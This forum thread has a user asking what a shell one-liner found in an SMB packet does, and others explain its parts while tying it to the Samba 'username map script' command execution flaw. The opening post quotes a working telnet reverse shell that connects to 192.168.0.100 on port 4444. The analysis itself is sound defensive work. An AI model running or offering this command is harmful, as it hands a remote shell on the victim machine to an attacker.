SMB shell script

C

caesar

Guest
Hi,

I found this script in an SMB packet in pcap capture.

Can anyone tell me what exactly this code does?

`nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|while : ; do sh && break; done 2>&1|telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'`
 


It appears to be spawning numerous shell processes and initiating telnet sessions on port 4444. nohup runs commands immune to hangups.

More port info is available here http://www.speedguide.net/port.php?port=4444

Check the results of
Code:
lsof -i
to see if you have telnet sessions going.

I'm no intrusion expert, but IMHO this appears to be a hack.
 
Actually it is a hypothetical attack.

But why do you think it is spawning numerous shells, I mean there is "&& break".
doesn't it mean: spawn one sh and if it has been successfully spawned break out the while??

what about the sleep, what's the need for it?
 
Last edited:
doesn't it mean: spawn one sh and if it has been successfully spawned break out the while??
That does seem to be what it's doing. I tried it and got two telnet connection attempts.
what about the sleep, what's the need for it?
That's confusing, especially the 3807 second delay time which would be just over an hour.

Another confusing aspect is the private ip address. Where is it attempting to connect?
 
Man, I got it.
As I told you this is a hypothetical attack need to be analyzed.
The attack can be found here: [ops I can't post links]!!!
you can google "Samba "username map script" Command Execution"
Thanks for your input.
 

Members online


Latest posts

Top